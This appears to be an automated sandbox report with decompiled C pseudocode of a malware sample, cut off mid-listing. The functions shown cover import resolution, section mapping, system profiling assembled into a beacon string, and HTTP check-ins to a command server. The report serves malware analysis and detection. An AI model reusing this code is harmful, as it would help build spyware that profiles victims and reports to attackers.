C-Code - Quality: 100%

			E00401000(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x404180;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x18bad598));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x43175ac3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x43175a44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x43175ac3;
										}
										 *_v16 = _t55;
										_t58 = _t59 * 4 - 0xc5d6b08;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0xbce8a5bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x00401000
0x00401009
0x0040100e
0x00401014
0x0040101d
0x00401023
0x00401025
0x00401028
0x0040102d
0x00401034
0x00401034
0x00401038
0x0040103e
0x00401043
0x00000000
0x00000000
0x00401049
0x00401053
0x00401055
0x00401058
0x0040105b
0x0040105f
0x00401067
0x00401069
0x0040106c
0x004010d4
0x004010d4
0x004010d8
0x00000000
0x00000000
0x00401071
0x00401077
0x00401079
0x0040108c
0x0040108f
0x0040108f
0x0040108f
0x00401093
0x0040107b
0x0040107b
0x00401083
0x00401085
0x00000000
0x00000000
0x00000000
0x00000000
0x00401085
0x00401073
0x00401073
0x00401087
0x00401087
0x00401087
0x00401096
0x00401099
0x0040109b
0x004010a2
0x0040109d
0x0040109d
0x0040109d
0x004010aa
0x004010b0
0x004010b2
0x004010e2
0x004010b4
0x004010b4
0x004010b7
0x004010b9
0x004010c1
0x004010c1
0x004010c6
0x004010c8
0x004010cf
0x004010d1
0x004010d1
0x004010d1
0x00000000
0x004010d1
0x00000000
0x004010b2
0x00401061
0x00401061
0x00401065
0x00000000
0x00000000
0x00401065
0x004010e5
0x004010e5
0x004010ec
0x004010f1
0x00000000
0x00000000
0x004010f7
0x00401102
0x00000000
0x00401102
0x004010f9
0x004010f9
0x004010ff
0x00000000
0x004010ff
0x0040102d
0x00401103
0x00401108

APIs

LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401038
GetProcAddress.KERNEL32(?,00000000), ref: 004010AA

Memory Dump Source

Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_server.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
Instruction ID: 069ebb05316bb06cd12a0d66d81b5033da0b120a8bf666a49d589dbfec54084e
Opcode Fuzzy Hash: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
Instruction Fuzzy Hash: 65314975E0020ADFDB14CF59C980AAAB7F4BF04301B24407AD981FB7A0E779DA81CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00401459 Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00401459(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x0040146b
0x00401471
0x0040147f
0x00401486
0x0040148b
0x00401491
0x00000000
0x00401492
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486

Memory Dump Source

Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_server.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 2ffffb3a0e1fef12aabb3d262299a14fd526f72662b70b4f27343324966f1358
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: E9F037B590020CFFDB11DFA5CC85CAFBBBDEB44354B10493AF552E50A0D6309E089B60

Uniqueness

Uniqueness Score: -1.00%

Function 047E3CE0 Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 222
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E047E3CE0(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				intOrPtr _t30;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				void* _t40;
				intOrPtr _t41;
				int _t44;
				intOrPtr _t45;
				int _t48;
				void* _t49;
				intOrPtr _t53;
				intOrPtr _t59;
				intOrPtr _t63;
				intOrPtr* _t65;
				void* _t66;
				intOrPtr _t71;
				intOrPtr _t77;
				intOrPtr _t80;
				intOrPtr _t83;
				int _t86;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t93;
				int _t96;
				void* _t98;
				void* _t99;
				void* _t103;
				void* _t105;
				void* _t106;
				intOrPtr _t107;
				long _t109;
				intOrPtr* _t110;
				intOrPtr* _t111;
				long _t112;
				int _t113;
				void* _t114;
				void* _t115;
				void* _t116;
				void* _t119;
				void* _t120;
				void* _t122;
				void* _t123;

				_t103 = __edx;
				_t99 = __ecx;
				_t120 =  &_v16;
				_t112 = __eax;
				_t30 =  *0x47ea3e0; // 0x5429c08
				_v4 = _t30;
				_v8 = 8;
				_t98 = RtlAllocateHeap( *0x47ea2d8, 0, 0x800);
				if(_t98 != 0) {
					if(_t112 == 0) {
						_t112 = GetTickCount();
					}
					_t33 =  *0x47ea018; // 0x9e6833dc
					asm("bswap eax");
					_t34 =  *0x47ea014; // 0x3a87c8cd
					asm("bswap eax");
					_t35 =  *0x47ea010; // 0xd8d2f808
					asm("bswap eax");
					_t36 =  *0x47ea00c; // 0x13d015ef
					asm("bswap eax");
					_t37 =  *0x47ea348; // 0xc3d5a8
					_t3 = _t37 + 0x47eb5ac; // 0x74666f73
					_t113 = wsprintfA(_t98, _t3, 2, 0x3d18f, _t36, _t35, _t34, _t33,  *0x47ea02c,  *0x47ea004, _t112);
					_t40 = E047E467F();
					_t41 =  *0x47ea348; // 0xc3d5a8
					_t4 = _t41 + 0x47eb575; // 0x74707526
					_t44 = wsprintfA(_t113 + _t98, _t4, _t40);
					_t122 = _t120 + 0x38;
					_t114 = _t113 + _t44;
					if(_a12 != 0) {
						_t93 =  *0x47ea348; // 0xc3d5a8
						_t8 = _t93 + 0x47eb508; // 0x732526
						_t96 = wsprintfA(_t114 + _t98, _t8, _a12);
						_t122 = _t122 + 0xc;
						_t114 = _t114 + _t96;
					}
					_t45 =  *0x47ea348; // 0xc3d5a8
					_t10 = _t45 + 0x47eb246; // 0x74636126
					_t48 = wsprintfA(_t114 + _t98, _t10, 0);
					_t123 = _t122 + 0xc;
					_t115 = _t114 + _t48; // executed
					_t49 = E047E472F(_t99); // executed
					_t105 = _t49;
					if(_t105 != 0) {
						_t88 =  *0x47ea348; // 0xc3d5a8
						_t12 = _t88 + 0x47eb8d0; // 0x736e6426
						_t91 = wsprintfA(_t115 + _t98, _t12, _t105);
						_t123 = _t123 + 0xc;
						_t115 = _t115 + _t91;
						HeapFree( *0x47ea2d8, 0, _t105);
					}
					_t106 = E047E1340();
					if(_t106 != 0) {
						_t83 =  *0x47ea348; // 0xc3d5a8
						_t14 = _t83 + 0x47eb8c5; // 0x6f687726
						_t86 = wsprintfA(_t115 + _t98, _t14, _t106);
						_t123 = _t123 + 0xc;
						_t115 = _t115 + _t86;
						HeapFree( *0x47ea2d8, 0, _t106);
					}
					_t107 =  *0x47ea3cc; // 0x5429600
					_a20 = E047E6B59(0x47ea00a, _t107 + 4);
					_t53 =  *0x47ea36c; // 0x54295b0
					_t109 = 0;
					if(_t53 != 0) {
						_t80 =  *0x47ea348; // 0xc3d5a8
						_t17 = _t80 + 0x47eb8be; // 0x3d736f26
						wsprintfA(_t115 + _t98, _t17, _t53);
					}
					if(_a20 != _t109) {
						_t116 = RtlAllocateHeap( *0x47ea2d8, _t109, 0x800);
						if(_t116 != _t109) {
							E047E2915(GetTickCount());
							_t59 =  *0x47ea3cc; // 0x5429600
							__imp__(_t59 + 0x40);
							asm("lock xadd [eax], ecx");
							_t63 =  *0x47ea3cc; // 0x5429600
							__imp__(_t63 + 0x40);
							_t65 =  *0x47ea3cc; // 0x5429600
							_t66 = E047E6675(1, _t103, _t98,  *_t65); // executed
							_t119 = _t66;
							asm("lock xadd [eax], ecx");
							if(_t119 != _t109) {
								StrTrimA(_t119, 0x47e9280);
								_push(_t119);
								_t71 = E047E7563();
								_v20 = _t71;
								if(_t71 != _t109) {
									_t110 = __imp__;
									 *_t110(_t119, _v8);
									 *_t110(_t116, _v8);
									_t111 = __imp__;
									 *_t111(_t116, _v32);
									 *_t111(_t116, _t119);
									_t77 = E047E21A6(0xffffffffffffffff, _t116, _v28, _v24); // executed
									_v56 = _t77;
									if(_t77 != 0 && _t77 != 0x10d2) {
										E047E63F6();
									}
									HeapFree( *0x47ea2d8, 0, _v48);
									_t109 = 0;
								}
								HeapFree( *0x47ea2d8, _t109, _t119);
							}
							RtlFreeHeap( *0x47ea2d8, _t109, _t116); // executed
						}
						HeapFree( *0x47ea2d8, _t109, _a12);
					}
					RtlFreeHeap( *0x47ea2d8, _t109, _t98); // executed
				}
				return _v16;
			}

0x047e3ce0
0x047e3ce0
0x047e3ce0
0x047e3cf5
0x047e3cf7
0x047e3cfc
0x047e3d00
0x047e3d0e
0x047e3d12
0x047e3d1a
0x047e3d22
0x047e3d22
0x047e3d24
0x047e3d30
0x047e3d3f
0x047e3d44
0x047e3d47
0x047e3d4c
0x047e3d4f
0x047e3d54
0x047e3d57
0x047e3d63
0x047e3d70
0x047e3d72
0x047e3d78
0x047e3d7d
0x047e3d88
0x047e3d8a
0x047e3d8d
0x047e3d93
0x047e3d95
0x047e3d9e
0x047e3da9
0x047e3dab
0x047e3dae
0x047e3dae
0x047e3db0
0x047e3db5
0x047e3dc1
0x047e3dc3
0x047e3dc6
0x047e3dc8
0x047e3dcd
0x047e3dd1
0x047e3dd3
0x047e3dd8
0x047e3de4
0x047e3de6
0x047e3df2
0x047e3df4
0x047e3df4
0x047e3dff
0x047e3e03
0x047e3e05
0x047e3e0a
0x047e3e16
0x047e3e18
0x047e3e24
0x047e3e26
0x047e3e26
0x047e3e2c
0x047e3e3f
0x047e3e43
0x047e3e48
0x047e3e4c
0x047e3e4f
0x047e3e54
0x047e3e5e
0x047e3e60
0x047e3e67
0x047e3e7f
0x047e3e83
0x047e3e8f
0x047e3e94
0x047e3e9d
0x047e3eae
0x047e3eb2
0x047e3ebb
0x047e3ec1
0x047e3ec9
0x047e3ece
0x047e3edb
0x047e3ee1
0x047e3eed
0x047e3ef3
0x047e3ef4
0x047e3ef9
0x047e3eff
0x047e3f05
0x047e3f0c
0x047e3f13
0x047e3f19
0x047e3f20
0x047e3f24
0x047e3f2f
0x047e3f34
0x047e3f3a
0x047e3f43
0x047e3f43
0x047e3f54
0x047e3f5a
0x047e3f5a
0x047e3f64
0x047e3f64
0x047e3f72
0x047e3f72
0x047e3f83
0x047e3f83
0x047e3f91
0x047e3f91
0x047e3fa2

APIs

RtlAllocateHeap.NTDLL ref: 047E3D08
GetTickCount.KERNEL32 ref: 047E3D1C
wsprintfA.USER32 ref: 047E3D6B
wsprintfA.USER32 ref: 047E3D88
wsprintfA.USER32 ref: 047E3DA9
wsprintfA.USER32 ref: 047E3DC1
wsprintfA.USER32 ref: 047E3DE4
HeapFree.KERNEL32(00000000,00000000), ref: 047E3DF4
wsprintfA.USER32 ref: 047E3E16
HeapFree.KERNEL32(00000000,00000000), ref: 047E3E26
wsprintfA.USER32 ref: 047E3E5E
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 047E3E79
GetTickCount.KERNEL32 ref: 047E3E89
RtlEnterCriticalSection.NTDLL(054295C0), ref: 047E3E9D
RtlLeaveCriticalSection.NTDLL(054295C0), ref: 047E3EBB

Part of subcall function 047E6675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E66A0
Part of subcall function 047E6675: lstrlen.KERNEL32(00000000,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E66A8
Part of subcall function 047E6675: strcpy.NTDLL ref: 047E66BF
Part of subcall function 047E6675: lstrcat.KERNEL32(00000000,00000000), ref: 047E66CA
Part of subcall function 047E6675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,047E3ECE,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E66E7

StrTrimA.SHLWAPI(00000000,047E9280,00000000,05429600), ref: 047E3EED

Part of subcall function 047E7563: lstrlen.KERNEL32(05429BF8,00000000,00000000,00000000,047E3EF9,00000000), ref: 047E7573
Part of subcall function 047E7563: lstrlen.KERNEL32(?), ref: 047E757B
Part of subcall function 047E7563: lstrcpy.KERNEL32(00000000,05429BF8), ref: 047E758F
Part of subcall function 047E7563: lstrcat.KERNEL32(00000000,?), ref: 047E759A

lstrcpy.KERNEL32(00000000,?), ref: 047E3F0C
lstrcpy.KERNEL32(00000000,?), ref: 047E3F13
lstrcat.KERNEL32(00000000,?), ref: 047E3F20
lstrcat.KERNEL32(00000000,00000000), ref: 047E3F24

Part of subcall function 047E21A6: WaitForSingleObject.KERNEL32(00000000,746981D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 047E2258

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 047E3F54
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 047E3F64
RtlFreeHeap.NTDLL(00000000,00000000,00000000,05429600), ref: 047E3F72
HeapFree.KERNEL32(00000000,?), ref: 047E3F83
RtlFreeHeap.NTDLL(00000000,00000000), ref: 047E3F91

Strings

Uet, xrefs: 047E3DF4, 047E3E26, 047E3F54, 047E3F64, 047E3F72, 047E3F83, 047E3F91

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$AllocateCountCriticalSectionTickTrim$EnterLeaveObjectSingleWaitstrcpy
String ID: Uet
API String ID: 186568778-2766386878
Opcode ID: 0ae9fabf0ddc15853771668753f344dbd8932c728de9fa03d4a353ba963e46c6
Instruction ID: a707324ad6474496f5f762c362ec6f137146e14113e1838f5711cd38a177a49a
Opcode Fuzzy Hash: 0ae9fabf0ddc15853771668753f344dbd8932c728de9fa03d4a353ba963e46c6
Instruction Fuzzy Hash: 677193B2500205AFC711DB67EC48EE77BE8EB8C714B058B14F909DB211E639ED05DB65

Uniqueness

Uniqueness Score: -1.00%

Function 047E7B83 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 126
networkstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E047E7B83(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E047E33DC(__eax + __eax + 1);
				if(_t56 != 0) {
					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
						E047E61DA(_t56);
					} else {
						E047E61DA( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E047E7B18) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E047E16B2( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x47ea348; // 0xc3d5a8
						_t15 = _t59 + 0x47eb845; // 0x544547
						_v8 = 0x84404000;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}

0x047e7b83
0x047e7b83
0x047e7b8e
0x047e7b95
0x047e7b9d
0x047e7ba7
0x047e7bad
0x047e7bc0
0x047e7bd0
0x047e7bc2
0x047e7bc5
0x047e7bca
0x047e7bca
0x047e7bc0
0x047e7be0
0x047e7be6
0x047e7beb
0x047e7cd4
0x00000000
0x047e7c06
0x047e7c09
0x047e7c1c
0x047e7c22
0x047e7c27
0x047e7c4f
0x047e7c62
0x047e7c6c
0x047e7c6f
0x047e7c75
0x047e7c7a
0x00000000
0x00000000
0x047e7c7e
0x047e7c8a
0x047e7c9b
0x047e7c9d
0x047e7cae
0x047e7cae
0x047e7cbe
0x00000000
0x047e7cd0
0x00000000
0x047e7cd0
0x00000000
0x00000000
0x00000000
0x047e7c27

APIs

lstrlen.KERNEL32(?,00000008,74654D40), ref: 047E7B95

Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8

InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 047E7BB8
InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 047E7BE0
InternetSetStatusCallback.WININET(00000000,047E7B18), ref: 047E7BF7
ResetEvent.KERNEL32(?), ref: 047E7C09
InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 047E7C1C
GetLastError.KERNEL32 ref: 047E7C29
HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 047E7C6F
InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 047E7C8D
InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 047E7CAE
InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 047E7CBA
InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 047E7CCA
GetLastError.KERNEL32 ref: 047E7CD4

Part of subcall function 047E61DA: RtlFreeHeap.NTDLL(00000000,00000000,047E6383,00000000,?,00000000,00000000), ref: 047E61E6

Strings

@MetNet, xrefs: 047E7C29, 047E7CD4

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
String ID: @MetNet
API String ID: 2290446683-2109406137
Opcode ID: a10cd05ed42d63da97987f5fb6213ce3bd7d0bcfdfeebeb0b784cfbd962100ee
Instruction ID: fb46a3ce5353d8b59b7767c103e1abd918dc5c2d5ed9f3186bbd84186ac4679a
Opcode Fuzzy Hash: a10cd05ed42d63da97987f5fb6213ce3bd7d0bcfdfeebeb0b784cfbd962100ee
Instruction Fuzzy Hash: 6D417FB1500604BFDB359F67DD88EAB7BBDEB4C704B104A18F602D5290E735AA45DB20

Uniqueness

Uniqueness Score: -1.00%

Function 047E6815 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 151
timememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E047E6815(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				struct %anon52 _v124;
				long _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				struct %anon52 _t66;
				void* _t69;
				void* _t73;
				signed int _t74;
				void* _t76;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t76 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x47ea2e0);
					_v76 = 0;
					_v80 = 0;
					L047E82DA();
					_v84.LowPart = _t46;
					_v80 = _t76;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x47ea30c; // 0x1ac
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x47ea2ec = 5;
						} else {
							_t69 = E047E5251(_t76); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x47ea300 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t74 = _v104.LowPart;
						_t58 = _t74 << 4;
						_t78 = _t89 + (_t74 << 4) + 0x38;
						_t75 = _t74 + 1;
						_v92.LowPart = _t74 + 1;
						_t61 = E047E35D2( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100);
						_v124 = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v92;
						_v104.LowPart = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v124.HighPart = E047E69E6(_t75,  &_v72, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x47ea2e4);
							goto L21;
						} else {
							__eflags =  *0x47ea2e8; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E047E63F6();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x47ea2e8);
								L21:
								L047E82DA();
								_v104.LowPart = _t61;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t65;
								__eflags = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t73 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							HeapFree( *0x47ea2d8, 0, _t54);
						}
						_t82 =  &(_t82[4]);
						_t73 = _t73 - 1;
					} while (_t73 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}

0x047e6815
0x047e682b
0x047e682f
0x047e6834
0x047e683b
0x047e6841
0x047e6847
0x047e69ce
0x047e684d
0x047e684d
0x047e684f
0x047e6854
0x047e6855
0x047e685b
0x047e685f
0x047e6863
0x047e6871
0x047e687f
0x047e6883
0x047e6885
0x047e6892
0x047e689e
0x047e68a0
0x047e68a6
0x047e68af
0x047e68ba
0x047e68ba
0x047e68b1
0x047e68b1
0x047e68b8
0x00000000
0x00000000
0x047e68b8
0x047e68c4
0x00000000
0x047e68c8
0x047e68cd
0x047e68d8
0x047e68d8
0x047e68e0
0x047e68e6
0x047e68ee
0x047e68f7
0x047e68fe
0x047e6902
0x047e6907
0x047e690d
0x00000000
0x00000000
0x047e690f
0x047e6913
0x047e691a
0x00000000
0x047e691c
0x047e692c
0x047e692c
0x00000000
0x047e695d
0x047e695d
0x047e6962
0x047e6981
0x047e6983
0x047e6988
0x047e6989
0x00000000
0x047e6964
0x047e6964
0x047e696a
0x00000000
0x047e696c
0x047e696c
0x047e6971
0x047e6973
0x047e6978
0x047e6979
0x047e698f
0x047e698f
0x047e6997
0x047e69a5
0x047e69a9
0x047e69b5
0x047e69b7
0x047e69bb
0x047e69bd
0x00000000
0x047e69c3
0x00000000
0x047e69c3
0x047e69bd
0x047e696a
0x00000000
0x047e6962
0x047e6930
0x047e6932
0x047e6936
0x047e6937
0x047e6937
0x047e693b
0x047e6945
0x047e6945
0x047e694b
0x047e694e
0x047e694e
0x047e6955
0x047e6955
0x047e69dc
0x00000000

APIs

memset.NTDLL ref: 047E682F
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 047E683B
